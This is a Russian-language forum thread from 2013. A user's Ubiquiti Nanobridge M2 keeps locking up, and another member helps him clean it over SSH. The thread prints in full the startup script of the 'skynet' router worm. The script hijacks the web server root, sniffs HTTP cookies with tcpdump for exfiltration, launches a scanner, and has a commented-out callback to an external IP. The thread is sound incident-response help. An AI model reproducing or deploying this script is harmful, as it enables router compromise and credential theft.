lvv Опубликовано 11 января, 2013 · Жалоба Уважаемые форумчане, где собака порылась? У моего Nanobridge M2 аптаймы по 27 часов 54 минуты. После этого на него нельзя зайти ни извне ни изнутри. Помогает ресет передергиванием питания. Посоветовали обновить прошивку. Скачал прошивку. Черех вэб интерфейс начал обновлять. Индикатор медленно дополз до середины, а потом быстро добежал до конца. Бридж перегрузился, захожу на него снова - прошивка старая. Запусил еще раз обновление - теперь индикатор медленно и уверенно дошел до конца Но теперь не могу зайти на вэб интрефейс и соответственно ни к каким настройкам доступа нет. IP адрес остался тем же, инет есть. Что делать??? Прошу помощи! Спасибо. Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
NewUse Опубликовано 11 января, 2013 · Жалоба У моего Nanobridge M2 аптаймы по 27 часов 54 минуты. После этого на него нельзя зайти ни извне ни изнутри. Помогает ресет передергиванием питания. Достаточно было вочдог настроить... У Вас случайно логирование не было включено? Какая прошивка стояла? Попробуйте через ssh подклюится, если полуится -- зайдите в /etc/persistent/ если там есть файлы вида rc.* то их надо удалить, после чего вести команду cfgmtd -p /etc -w и перегрузить Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
YuryD Опубликовано 12 января, 2013 · Жалоба По https не пробовали войти ? Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
lvv Опубликовано 12 января, 2013 · Жалоба Достаточно было вочдог настроить... У Вас случайно логирование не было включено? Перед прошивкой сделал скриншоты всех вкладок. На вкладке Sestemlog - Enable Ping WatchDog и Enable System Log флажки сняты. Какая прошивка стояла? Стояла 5.3.3 Хотел поставить 5.5.3 Попробуйте через ssh подклюится, если полуится -- зайдите в /etc/persistent/ если там есть файлы вида rc.* то их надо удалить, после чего вести команду cfgmtd -p /etc -w и перегрузить Это попробую, но пока не знаю как - никогда не делал и не знаю как это делается (( По https не пробовали войти ? Попробовал - то же самое Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
lvv Опубликовано 12 января, 2013 · Жалоба У моего Nanobridge M2 аптаймы по 27 часов 54 минуты. После этого на него нельзя зайти ни извне ни изнутри. Помогает ресет передергиванием питания. Достаточно было вочдог настроить... У Вас случайно логирование не было включено? Какая прошивка стояла? Попробуйте через ssh подклюится, если полуится -- зайдите в /etc/persistent/ если там есть файлы вида rc.* то их надо удалить, после чего вести команду cfgmtd -p /etc -w и перегрузить Все проделал - интерфейс запустился)) Только тот файл не стал удалять, переименовал. Понаблюдаю теперь какой будет аптайм, может попустило. Спасибо! Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
NewUse Опубликовано 12 января, 2013 · Жалоба У Вас вирус. Этого файла быть не должно. Вирус мог попасть из-за старой весии прошивки, в которой была известная дыра в безопасности. Чтоб такого не повторялось следует использовать спец. vlan для управления точками. Сделайте cat rc.остаток_имени_файла Интересно посмотреть на код вируса. Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
lvv Опубликовано 13 января, 2013 (изменено) · Жалоба Не знаю как сам текст скопировать (( Пробовал выделять мышкой, а он потом как-то дублировался в окне, он хоть не выполнился? XM.v5.5.3# ls cardlist.txt dropbear_rsa_host_key dropbear_dss_host_key rcpoststartold XM.v5.5.3# cat rcpoststartold #!/bin/sh sed -i 's/\/usr\/www/\/etc\/persistent\/.skynet/g' /etc/lighttpd.conf kill -9 `ps | grep "lighttpd -D" | cut -d" " -f 3` ip=`ifconfig ath0 | grep inet | sed "s/.*inet addr:\([^ ]*\).*/\1/g"` #sleep 60 && trigger_url http://178.216.144.75/probe.cgi/.gif?ip=$ip & if [ -e /bin/tcpdump ]; then tcpdump -A -s 0 -w - -l "tcp dst port 80" | grep "^Cookie: " | grep "xs=" >/etc/persistent/.skynet/tt & /etc/persistent/.skynet/sendcook & fi (sleep 20 ; /etc/persistent/.skynet/scan) & (sleep 100400 ; sleep 42 ; halt) & XM.v5.5.3# Изменено 13 января, 2013 пользователем lvv Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
NewUse Опубликовано 13 января, 2013 · Жалоба Как только Вы выделили мышью -- он скопировался (и можно уже вставлять), а если нажали правой кнопкой -- вставился, ну и что-то выполнилось,но не очень страшно. Да, это вирус skynet, правда, одной из первых версий, так что ничего особо страшного... интересно, что за: cardlist.txt Его там тоже не должно быть. И судя по коду там должна быть скрытая папка: ls -a ./skynet её можно тоже удалить Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
lvv Опубликовано 13 января, 2013 · Жалоба XM.v5.5.3# ls -a . cardlist.txt dropbear_rsa_host_key .. dropbear_dss_host_key rcpoststartold XM.v5.5.3# cat cardlist.txt #Format: #Vendor:Product:cdma/gsm:PPP dev handle:backend dev handle:AT+CSQ:pic file name:notes:backendmode 1199:6880:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_mercury_connect.gif:Sierra Wireless USB Connect Mercury:2 1199:6890:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_usb888.gif:Sierra Wireless USB 888:3 1199:0025:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_598U.gif:Sierra Wireless 598U:1 1199:68a3:gsm:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_lightning_usb305.gif:Sierra Wireless Lightning USB 305:3 1199:683c:gsm:/dev/ttyUSB4:/dev/ttyUSB3:AT+CSQ:3g_sierra_mc8790.gif:Sierra MC8790 HSPA Module:3 1410:6000:cdma:/dev/ttyUSB0::AT+CSQ:3g_novatel_usb760.png:Novatel U760:0 1004:6141:gsm:/dev/ttyACM0:/dev/ttyACM1:AT+CSQ:3g_lg_usbconnect_turbo.gif:LGE USB Connect Turbo:3 1199:0024:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5727.gif:Sierra MC5727:1 1199:0224:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5727.gif:Sierra MC5727:1 1199:0028:cdma:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_sierra_mc5728.gif:Sierra MC5728:1 #unverified that anything is on ttyUSB1 0af0:7a05:gsm:/dev/ttyUSB0:/dev/ttyUSB1:AT+CSQ:3g_option_usbconnect_velocity.gif:Option USB Connect Velocity:0 12d1:1464:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_vodafone_huawei.gif:Vodafone Mobile Broadband (Huawei):3 19d2:0015:gsm:/dev/ttyUSB0:/dev/ttyUSB2:AT+CSQ:3g_zte_mf628.gif:ZTE MF628:3 19d2:0016:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_zte_k3565_z.gif:Vodafone ZTE K3565-Z:3 19d2:0063:gsm:/dev/ttyUSB3:/dev/ttyUSB1:AT+CSQ:3g_zte_k3565_z.gif:Vodafone ZTE K3565-Z:3 19d2:0104:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_zte_k4505_z.gif:Vodafone ZTE K4505-Z:3 12d1:140c:gsm:/dev/ttyUSB0:/dev/ttyUSB3:AT+CSQ:3g_huawei_E173.gif:Huawei E173:3 XM.v5.5.3# Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
NewUse Опубликовано 13 января, 2013 · Жалоба Фигя какая-то, ну и фиг с ней, рекомендую, кста, перегрузить ещё раз, сменить пароль(т.к. вирус мог его стырить) и перегрузить повторно. Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...
lvv Опубликовано 14 января, 2013 (изменено) · Жалоба NewUse Ура - все заработало как надо! Проблема решена (удалил лишние файлы)!!! Спасибо большое!!! Изменено 14 января, 2013 пользователем lvv Вставить ник Цитата Ответить с цитированием Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах More sharing options...